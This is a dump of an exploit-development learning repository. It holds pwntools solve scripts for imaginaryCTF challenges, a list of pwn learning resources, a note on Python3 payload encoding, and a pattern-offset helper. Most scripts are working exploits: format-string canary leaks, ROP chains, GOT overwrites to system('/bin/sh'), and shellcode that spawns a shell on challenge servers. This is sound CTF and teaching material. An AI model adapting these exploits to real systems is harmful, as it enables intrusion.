├── Advanced Stack based Binary exploitation for CTFs.pdf ├── CTF ├── imaginaryCTF-daily │ ├── july_22 │ │ └── pwn │ │ │ ├── ESCHEW_five │ │ │ ├── club │ │ │ └── solve.py │ │ │ ├── README.md │ │ │ ├── blind │ │ │ ├── ld-2.31.so │ │ │ ├── libc-2.31.so │ │ │ ├── libc.so.6 │ │ │ ├── solve.py │ │ │ └── vuln │ │ │ ├── dont-syscall-me │ │ │ ├── solve.py │ │ │ └── vuln │ │ │ ├── notepad_pwn │ │ │ ├── notepad │ │ │ └── solve.py │ │ │ └── re-blinded │ │ │ ├── ld-2.31.so │ │ │ ├── libc-2.31.so │ │ │ ├── libc.so.6 │ │ │ ├── solve.py │ │ │ └── vuln │ └── june_22 │ │ └── pwn │ │ ├── README.md │ │ ├── easy_pwn2 │ │ └── solve.py │ │ ├── links_1 │ │ ├── flag.txt │ │ ├── links1 │ │ └── solve.py │ │ ├── links_2 │ │ ├── links2 │ │ └── solve.py │ │ └── links_3 │ │ ├── links3 │ │ └── solve.py └── imaginaryCTF2022 │ └── pwn │ └── bellcode │ ├── bellcode │ └── solve.py ├── GetRidofC2.md ├── Hack.lu_2024.pdf ├── README.md ├── STACK BASED EXPLOITATION.pdf ├── logo.png ├── pattern.py ├── protostar ├── format │ ├── 0format.exp │ ├── 1format.py │ ├── 2format.py │ ├── 3format.py │ ├── 4format.py │ └── challenge binaries │ │ ├── format0 │ │ ├── format1 │ │ ├── format2 │ │ ├── format3 │ │ └── format4 └── stack │ ├── challenge binaries │ ├── stack0 │ ├── stack1 │ ├── stack2 │ ├── stack3 │ ├── stack4 │ ├── stack5 │ ├── stack6 │ └── stack7 │ ├── stack0.py │ ├── stack1.exp │ ├── stack2.exp │ ├── stack3.py │ ├── stack4.exp │ ├── stack5.py │ ├── stack6.py │ └── stack7.py ├── pwn 101 TamilCTF session.pdf ├── pwn101 banner.png ├── pwncode.py ├── random_pwn_challs ├── ret2dlresolve │ └── seccon_2021_kasu_bof.py └── sigrop │ └── DarkCon_2021_easy_rop.py ├── roadmap.md └── stack_master ├── README.md └── easy-rop ├── easy-rop └── exploit.py /Advanced Stack based Binary exploitation for CTFs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/Advanced Stack based Binary 
exploitation for CTFs.pdf -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/ESCHEW_five/club: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/ESCHEW_five/club -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/ESCHEW_five/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('club') 4 | p = elf.process() 5 | p = remote('puzzler7.imaginaryctf.org',3003) 6 | rop = ROP(elf) 7 | p.recv() 8 | p.sendline('%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%p') 9 | leak = p.recvuntil('0x') 10 | canary = int( b'0x0'+ p.recv(16),16) 11 | # payload 12 | 13 | payload = b'A'*72 14 | payload += p64(canary) 15 | payload += b'A'*8 16 | payload += p64(rop.find_gadget(['ret'])[0]) 17 | payload += p64(elf.sym.win) 18 | 19 | p.sendline(payload) 20 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/README.md: -------------------------------------------------------------------------------- 1 | ![](https://i.imgur.com/6Qfwrne.png) 2 | 3 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/ld-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/libc-2.31.so: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/libc-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/libc.so.6 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('vuln',checksec=False) 5 | rop = ROP(elf) 6 | p = elf.process() 7 | p = remote('blind.chal.imaginaryctf.org',1337) 8 | ## pwncode[H4ppy_pWn1nG] 9 | 10 | # gadgets 11 | gadg_3d = 0x000000000040111c # add dword ptr [rbp - 0x3d], ebx 12 | csu = 0x00000000004011ca 13 | one_gadget_minus_read = -173250 14 | 15 | payload = flat( 16 | 'A'*40, 17 | csu, 18 | one_gadget_minus_read, 19 | elf.got['read']+0x3d, 20 | 0,0,0,0, 21 | gadg_3d, 22 | elf.sym['read'] 23 | ) 24 | 25 | p.sendline(payload) 26 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/vuln -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/dont-syscall-me/solve.py: -------------------------------------------------------------------------------- 
1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('vuln',checksec=False) 5 | p = elf.process() 6 | p = remote('dont-syscall-me.chal.imaginaryctf.org',1337) 7 | 8 | shellcode = asm(''' 9 | lea r8,[rip]+0x3000 # near ld .text section 10 | 11 | search_syscall: 12 | mov r11,0x4d2 13 | add r11,0x3d # search syscall gadget opcode 14 | cmp word ptr[r8],r11w 15 | je get_shell 16 | inc r8 17 | jmp search_syscall 18 | 19 | get_shell: 20 | mov rax,0x3b 21 | lea rdi,[rip+sh] 22 | jmp r8 # syscall 23 | 24 | sh: 25 | .ascii "/bin/sh" 26 | ''') 27 | 28 | print(len(shellcode)) 29 | p.send(shellcode) 30 | p.interactive() # ictf{sc4nn1ng_thrU_m3m0ry} -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/dont-syscall-me/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/dont-syscall-me/vuln -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/notepad_pwn/notepad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/notepad_pwn/notepad -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/notepad_pwn/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('notepad',checksec=False) 4 | rop = ROP(elf) 5 | p = elf.process() 6 | p = remote('puzzler7.imaginaryctf.org',3001) 7 | 8 | payload = p64(rop.find_gadget(['ret'])[0]) 9 | payload += p64(elf.sym.win) 10 | 11 | p.sendlineafter('>>>','2') 12 | p.sendlineafter('>>>','-24') 13 | 
p.sendlineafter('>>>',payload) 14 | 15 | p.interactive() 16 | 17 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/ld-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc.so.6 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('vuln',checksec=False) 5 | rop = ROP(elf) 6 | p = elf.process() 7 | ## pwncode[H4ppy_pWn1nG] 8 | 9 | # gadgets 10 | gadg_3d = 0x40113c # add dword ptr [rbp - 0x3d], ebx 11 | csu = 0x00000000004011fa 12 | one_gadget_minus_read = -173250 13 | 14 | payload = flat( 15 | 'A'*40, 16 | csu, 17 | one_gadget_minus_read, 18 | elf.got['read']+0x3d, 19 | 0,0,0,0, 20 | gadg_3d, 21 | elf.sym['read'] 22 | ) 23 | 24 | p.sendline(payload) 25 | p.interactive() 
-------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/vuln -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/README.md: -------------------------------------------------------------------------------- 1 | ![](https://i.imgur.com/CgEbBgT.png) 2 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/easy_pwn2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # p = remote('puzzler7.imaginaryctf.org',2001) 4 | # context.log_level = "CRITICAL" 5 | 6 | for i in range(1,100): 7 | p = remote('puzzler7.imaginaryctf.org',2001) 8 | p.sendlineafter('something',f'%{i}$p') 9 | leak = p.recvuntil('What').split()[0].decode('latin-1') 10 | print(f'[{i}] => {leak}') 11 | # log.critical('yesss') 12 | p.close() 13 | 14 | ''' 15 | [6] => 0x5f73315f73316874 16 | [7] => 0x726333735f336874 17 | [8] => 0xa7474747433 18 | ''' 19 | 20 | # ictf{3asy_f0rm4t_str1ng_vuln} -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_1/flag.txt: -------------------------------------------------------------------------------- 1 | flag{now_on_server} 2 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_1/links1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/june_22/pwn/links_1/links1 
-------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_1/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('links1') 4 | p = elf.process() 5 | rop = ROP(elf) 6 | 7 | #p = remote('puzzler7.imaginaryctf.org',2004) 8 | 9 | p.sendlineafter('>>>','2') 10 | p.sendlineafter('>>>','0') 11 | p.sendlineafter('>>>','jo') 12 | p.sendlineafter('>>>','2') 13 | p.sendlineafter('>>>','1') 14 | p.sendlineafter('>>>','pugal') 15 | p.sendlineafter('>>>','2') 16 | p.sendlineafter('>>>','0') 17 | 18 | payload = b'A'*64 19 | payload += p64(0x4040C0) 20 | 21 | p.sendlineafter('>>>',payload) 22 | log.warning('choose option 1 and exit immediately') 23 | p.recvuntil('>>>') 24 | p.interactive() 25 | 26 | # ictf{arbitrary_read_ftw_d52a23c3} 27 | 28 | # flag stored at: 0x4040C0 29 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_2/links2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/june_22/pwn/links_2/links2 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('links2') 4 | p = elf.process() 5 | #p = remote('puzzler7.imaginaryctf.org',2007) 6 | 7 | #### functions 8 | def view(): 9 | p.sendlineafter('>>>','1') 10 | 11 | def write(index,value): 12 | p.sendlineafter('>>>','2') 13 | p.sendlineafter('>>>',index) 14 | p.sendlineafter('>>>',value) 15 | 16 | def view_time(): 17 | p.sendlineafter('>>>','3') 18 | 19 | # PAYLOAD 20 | write('0','/bin/sh\x00') # writing bin sh in 0th index 
21 | write('1','B'*64) 22 | write('2','C'*64) 23 | 24 | ## overwrite next 25 | payload = b'D'*64 26 | payload += p64(elf.got['fgets']) 27 | write('1',payload) # overwriting 1 st value's next with fgets got 28 | write('2',p64(elf.sym['system'])) # now the seccond value we write will be stored in fgets got 29 | 30 | ## shell 31 | p.sendline('2') # calling write() 32 | p.sendline('0') # we're giving 0, coz our /bin/sh is in 0th index 33 | # now it calls fgets with the value in index 0 34 | # so we can execute system('/bin/sh') 35 | p.interactive() 36 | 37 | # ictf{who_knew_the_current_date_could_be_so_dangerous?} 38 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_3/links3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/june_22/pwn/links_3/links3 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_3/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('links3',checksec=False) 4 | libc = elf.libc 5 | p = elf.process() 6 | 7 | def write(index,value): 8 | p.sendlineafter('>>>','2') 9 | p.sendlineafter('>>>',index) 10 | p.sendlineafter('>>>',value) 11 | 12 | 13 | ### create few allocations 14 | log.info('creating 3 allocations') 15 | write('0','/bin/sh\x00') 16 | write('1','B'*8) 17 | write('2','C'*8) 18 | 19 | #### write next of 1st element with printf 20 | log.info("Overwritting 2nd element's next pointer with printf got address") 21 | payload = b'C'*64 22 | payload += p64(elf.got['printf']) 23 | write('1',payload) 24 | 25 | # leak 26 | log.info('leaking plt address of printf') 27 | p.sendlineafter('>>>','1') 28 | leak = p.recvuntil('\x7f').split()[-1]+b'\x00\x00' 29 | leak 
= u64(leak) 30 | libc_base = leak - libc.sym['printf'] 31 | log.success(f'printf leak: {hex(leak)}') 32 | log.info('calculating libc base') 33 | log.success(f'libc base: {hex(libc_base)}') 34 | 35 | # overwtite 1st element's next with fgets 36 | log.info("Overwritting 2nd element's next pointer with fgets got address") 37 | payload = b'C'*64 38 | payload += p64(elf.got['fgets']) 39 | write('1',payload) 40 | 41 | # ovwrite fgets got with system 42 | log.info("Now 2nd element's next points to fgets got") 43 | log.info("If we try to edit the 3rd element then we can modify fgets address") 44 | log.info("Overwritting fgets with system ") 45 | system = libc_base + libc.sym['system'] 46 | write('2',p64(system)) 47 | 48 | # trigger system with 0th index 49 | # now it executes system('/bin/sh') -> coz we wrote /bin/sh in 0th index 50 | log.info("1st element has '/bin/sh' string") 51 | log.info("Triggering system('/bin/sh') by calling fgets with 1st element") 52 | p.sendlineafter('>>>','2') 53 | p.sendlineafter('>>>','0') 54 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF2022/pwn/bellcode/bellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF2022/pwn/bellcode/bellcode -------------------------------------------------------------------------------- /CTF/imaginaryCTF2022/pwn/bellcode/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('./bellcode',checksec=False) 4 | p = elf.process() 5 | 6 | shellcode = asm( 7 | 8 | # craft rdx = 0x0 9 | ''' 10 | push rax 11 | pop rdx 12 | ''' + 13 | 14 | 15 | # craft rsi = 0x0 16 | ''' 17 | xchg esi,eax 18 | '''+ 19 | 20 | 21 | # craft bin sh 22 | ''' 23 | // mov rax to 0x0 (r14 has the value 0) 24 | xchg eax,r14d 25 | 26 | 
// 0x2f - / 27 | dec eax 28 | sub eax,0xfffffaff 29 | sub eax,0xff 30 | sub eax,0xff 31 | sub eax,0xff 32 | sub eax,0xff 33 | sub eax,0xd2 34 | dec eax 35 | dec eax 36 | dec eax 37 | 38 | push rbp 39 | pop rdi 40 | stos BYTE PTR es:[rdi],al 41 | 42 | // 62 - b 43 | sub eax,0xfffffaff 44 | sub eax,0xff 45 | sub eax,0xff 46 | sub eax,0xff 47 | sub eax,0xff 48 | sub eax,0xd2 49 | stos BYTE PTR es:[rdi], al 50 | 51 | // 69 - i 52 | sub eax,0xfffffaff 53 | sub eax,0xff 54 | sub eax,0xff 55 | sub eax,0xff 56 | sub eax,0xff 57 | sub eax,0xfa 58 | dec eax 59 | dec eax 60 | dec eax 61 | dec eax 62 | stos BYTE PTR es:[rdi], al 63 | 64 | // 6e - n 65 | sub eax,0xfffffaff 66 | sub eax,0xff 67 | sub eax,0xff 68 | sub eax,0xff 69 | sub eax,0xff 70 | sub eax,0xfa 71 | dec eax 72 | dec eax 73 | dec eax 74 | dec eax 75 | dec eax 76 | dec eax 77 | stos BYTE PTR es:[rdi], al 78 | 79 | // 2f - / 80 | dec eax 81 | sub eax,0xfffffaff 82 | sub eax,0xff 83 | sub eax,0xff 84 | sub eax,0xff 85 | sub eax,0xff 86 | sub eax,0xff 87 | '''+''' 88 | dec eax 89 | '''*68 +''' 90 | stos BYTE PTR es:[rdi], al 91 | 92 | // 73 - s 93 | dec eax 94 | sub eax,0xfffffaff 95 | sub eax,0xff 96 | sub eax,0xff 97 | sub eax,0xff 98 | sub eax,0xff 99 | sub eax,0xbe 100 | dec eax 101 | dec eax 102 | stos BYTE PTR es:[rdi], al 103 | 104 | 105 | // 68 - h 106 | dec eax 107 | sub eax,0xfffffaff 108 | sub eax,0xff 109 | sub eax,0xff 110 | sub eax,0xff 111 | sub eax,0xff 112 | sub eax,0xbe 113 | '''+''' 114 | dec eax 115 | '''*81+''' 116 | stos BYTE PTR es:[rdi], al 117 | 118 | push rbp 119 | pop rdi 120 | '''+ 121 | 122 | # set rax to 0x3b 123 | ''' 124 | dec eax 125 | '''*45 + 126 | 127 | ### Everything is set, make a syscall!!! 
128 | ''' 129 | syscall 130 | ''' 131 | ) 132 | 133 | print(disasm(shellcode)) 134 | 135 | # check 136 | for byte in shellcode: 137 | if byte % 5: 138 | log.critical(f'invalid byte {hex(byte)}') 139 | exit() 140 | 141 | # p.interactive('OPEN GDB ') 142 | 143 | p = remote('bellcode.chal.imaginaryctf.org',1337) 144 | p.sendline(shellcode) 145 | p.interactive() 146 | -------------------------------------------------------------------------------- /GetRidofC2.md: -------------------------------------------------------------------------------- 1 | # Python 3 encoding problems 2 | 3 | Here I'm gonna say the solution to one of the python3 encoding problem (C2) 4 | 5 | ### Ok what's C2? 6 | 7 | ![img1](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(707).png) 8 | 9 | Here I've created an exploit with python3, but the exploit not working :/ 10 | Let's analyse this... 11 | 12 | 13 | ![img2](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(708).png) 14 | 15 | Our exploit not working coz we have C2 before every bytes, Python3 has some encoding issues we need to change something in this to encode it correctly. 16 | 17 | 18 | ### Same exploit on python2 19 | 20 | ![img3](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(709).png) 21 | 22 | See here python2 has no issues in this, however we can use python2 but I'm a user of python3 so it takes some extra time for me to code in python2. 
23 | Also I have issues in some python2 modules too :/ 24 | 25 | 26 | ## FIX 27 | 28 | ![img4](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(710).png) 29 | 30 | Now here we're fixing the issue by specifying `encode('latin-1')` and using `sys.stdout.buffer.write()` instead of print() 31 | 32 | Coz print has some issues in this, It'll print the encoded payload within `b' '` so our payload will be messed up :/ 33 | 34 | 35 | ![img5](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(711).png) 36 | 37 | 38 | See now here no more c2 :) 39 | 40 | I hope this will be helpful to you while doing binary exploitation :) 41 | -------------------------------------------------------------------------------- /Hack.lu_2024.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/Hack.lu_2024.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![banner](https://github.com/jopraveen/exploit-development/raw/main/pwn101%20banner.png) 2 | 3 | I'll post some resources,writeups,exploits,source-codes in this repo 4 | 5 | ### Highly recommended site to learn/practice pwn : **https://dojo.pwn.college/** 6 | 7 | ### Blogs:- 8 | * https://www.cs.wcupa.edu/schen/security/ 9 | * https://www.bordergate.co.uk/category/exploit-dev/ 10 | * https://ir0nstone.gitbook.io/notes/ 11 | * https://guyinatuxedo.github.io/index.html 12 | * https://heap-exploitation.dhavalkapil.com/ 13 | * https://github.com/AidenPearce369/pwnable.kr 14 | * https://github.com/AidenPearce369/ExploitDev 15 | * https://github.com/AidenPearce369/phoenix 16 | * https://faraz.faith/ 17 | * https://d4mianwayne.github.io/ 18 | * https://wiki.bi0s.in/pwning/roadmap/ 19 | * https://blog.skullsecurity.org/category/ctfs 20 | * 
https://sploitfun.wordpress.com/ 21 | * https://ret2rop.blogspot.com/ 22 | * https://blog.fxiao.me/how-to-heap/ 23 | * https://www.youtube.com/watch?v=6-Et7M7qJJg 24 | 25 | #### Heap Exploitation 26 | 27 | * https://0x434b.dev/overview-of-glibc-heap-exploitation-techniques/ 28 | * https://ir0nstone.gitbook.io/notes/types/heap/introduction-to-the-heap 29 | * https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-part-1-515b3621e0e8 30 | * https://youtu.be/HPDBOhiKaD8 31 | * https://www.0x0ff.info/2014/heap-based-buffer-overflow/ 32 | * https://youtu.be/woKGxIrKFBc 33 | * https://devel0pment.de/?p=688 34 | * https://sensepost.com/blog/2018/linux-heap-exploitation-intro-series-set-you-free-part-1/ 35 | * https://courseupload.com/linux-heap-exploitation-200321/ 36 | * https://heap-exploitation.dhavalkapil.com/ 37 | * http://blog.fxiao.me/how-to-heap/ 38 | * https://youtu.be/nnF4Avttbns 39 | * https://youtu.be/A-Qf_Q_AeFw 40 | * https://www.youtube.com/watch?v=PFqEKkj7wWs 41 | 42 | #### Kernel exploitation 43 | 44 | * https://github.com/xairy/linux-kernel-exploitation/blob/master/README.md 45 | * https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html 46 | * https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep 47 | * https://arjunsreedharan.org/post/82710718100/kernel-101-lets-write-a-kernel 48 | * https://web.archive.org/web/20171029060939/http://www.blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/ 49 | * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/ 50 | * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-2/ 51 | 52 | #### Browser exploit 53 | 54 | * https://youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t 55 | * https://blog.ret2.io/2018/06/05/pwn2own-2018-exploit-development/ 56 | * https://github.com/Escapingbug/awesome-browser-exploit 57 | * 
https://youtu.be/3szZpS58Dqg 58 | * https://github.com/Geluchat/chrome_v8_exploit 59 | 60 | ### Youtube:- 61 | 62 | * https://youtube.com/playlist?list=PLiCcguURxSpbD9M0ha-Mvs-vLYt-VKlWt 63 | * https://www.youtube.com/c/pwncollege/playlists 64 | * https://youtube.com/playlist?list=PL1H1sBF1VAKVg451vJ-rx0y_ZuQMHPamH 65 | * https://www.youtube.com/channel/UCi-IXmtQLrJjg5Ji78DqvAg/videos 66 | * https://youtube.com/playlist?list=PLhy9gU5W1fvUND_5mdpbNVHC1WCIaABbP 67 | * https://www.youtube.com/c/BasteG0d69/videos 68 | * https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN 69 | * https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A 70 | * https://www.youtube.com/playlist?list=PLeSXUd883dhjnFXPf2QA0KnUnJnn9dPWy 71 | * https://www.youtube.com/playlist?list=PLHUKi1UlEgOKAVRdiMlpX6hgayiY6dTwu 72 | 73 | ### Wargames:- 74 | 75 | * http://pwnable.kr/ 76 | * http://pwnable.tw/ 77 | * http://pwn.eonew.cn 78 | * https://www.root-me.org/?lang=en 79 | * http://smashthestack.org/ 80 | * https://exploit.education/ 81 | 82 | 83 | ### Pwn Related Stuffs:- 84 | 85 | * How2Heap - https://github.com/shellphish/how2heap 86 | 87 | * Tips & Trics - https://karol-mazurek95.medium.com/pwn-tips-tricks-linux-d10186e8580e 88 | 89 | * PwnTips - https://github.com/Naetw/CTF-pwn-tips 90 | 91 | * Quick guide -https://trailofbits.github.io/ctf/exploits/binary1.html 92 | 93 | * Course materials for Modern Binary Exploitation by RPISEC - https://github.com/RPISEC/MBE 94 | 95 | * Learn ROP - https://ropemporium.com/ 96 | 97 | * For Linux binary Exploitation - https://github.com/scwuaptx/HITCON-Training 98 | 99 | * Intro to binary exploitation / reverse engineering course - https://guyinatuxedo.github.io/ 100 | 101 | * A collection of pwn/CTF related utilities for Ghidra - https://github.com/0xb0bb/pwndra 102 | 103 | * Some pwn challenges selected for training and education. 
- https://github.com/BrieflyX/ctf-pwns 104 | 105 | * A set of Linux binary exploitation tasks for beginners on various architectures - https://github.com/xairy/easy-linux-pwn 106 | 107 | * ASM Basics - https://asmtutor.com/#lesson1 108 | 109 | --=[ SOME GAME HACKING CTFs]==- 110 | * https://github.com/mrT4ntr4/CTF-Game-Challenges 111 | 112 | Credits: 113 | Thanks for all open source contributers 114 | -------------------------------------------------------------------------------- /STACK BASED EXPLOITATION.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/STACK BASED EXPLOITATION.pdf -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/logo.png -------------------------------------------------------------------------------- /pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | 5 | try: 6 | import clipboard 7 | except ImportError: 8 | pass 9 | from string import ascii_uppercase, ascii_lowercase, digits 10 | 11 | MAX_PATTERN_LENGTH = 20280 12 | 13 | 14 | class MaxLengthException(Exception): 15 | pass 16 | 17 | 18 | class WasNotFoundException(Exception): 19 | pass 20 | 21 | 22 | def pattern_gen(length): 23 | """ 24 | Generate a pattern of a given length up to a maximum 25 | of 20280 - after this the pattern would repeat 26 | """ 27 | if length >= MAX_PATTERN_LENGTH: 28 | raise MaxLengthException( 29 | "ERROR: Pattern length exceeds " "maximum of {0}".format(MAX_PATTERN_LENGTH) 30 | ) 31 | 32 | pattern = "" 33 | for upper in ascii_uppercase: 34 | for lower in ascii_lowercase: 35 | for digit in digits: 36 | if len(pattern) 
< length: 37 | pattern += upper + lower + digit 38 | 39 | else: 40 | out = pattern[:length] 41 | return out 42 | 43 | 44 | def pattern_search(search_pattern): 45 | """ 46 | Search for search_pattern in pattern. Convert from hex if needed 47 | Looking for needle in haystack 48 | """ 49 | needle = search_pattern 50 | 51 | try: 52 | if needle.startswith("0x"): 53 | # Strip off '0x', convert to ASCII and reverse 54 | needle = needle[2:] 55 | needle = bytearray.fromhex(needle).decode("ascii") 56 | needle = needle[::-1] 57 | except (ValueError, TypeError) as e: 58 | raise 59 | 60 | haystack = "" 61 | for upper in ascii_uppercase: 62 | for lower in ascii_lowercase: 63 | for digit in digits: 64 | haystack += upper + lower + digit 65 | found_at = haystack.find(needle) 66 | if found_at > -1: 67 | return found_at 68 | 69 | raise WasNotFoundException( 70 | "Couldn`t find {0} ({1}) " 71 | "anywhere in the pattern.".format(search_pattern, needle) 72 | ) 73 | 74 | 75 | def print_help(): 76 | print("Usage: {0} [LENGTH|PATTERN]\n".format(sys.argv[0])) 77 | print("Generate a pattern of length LENGTH or search for PATTERN and ") 78 | print("return its position in the pattern.\n") 79 | 80 | 81 | if __name__ == "__main__": 82 | if len(sys.argv) < 2: 83 | print_help() 84 | sys.exit(0) 85 | 86 | if sys.argv[1] == "-h" or sys.argv[1] == "--help": 87 | print_help() 88 | sys.exit(0) 89 | 90 | if sys.argv[1].isdigit(): 91 | try: 92 | pat = pattern_gen(int(sys.argv[1])) 93 | try: 94 | clipboard.copy(pat) 95 | print("Pattern copied to clipboard: \n") 96 | except NameError: 97 | pass 98 | 99 | print(pat) 100 | 101 | except MaxLengthException as e: 102 | print(e) 103 | else: 104 | try: 105 | found = 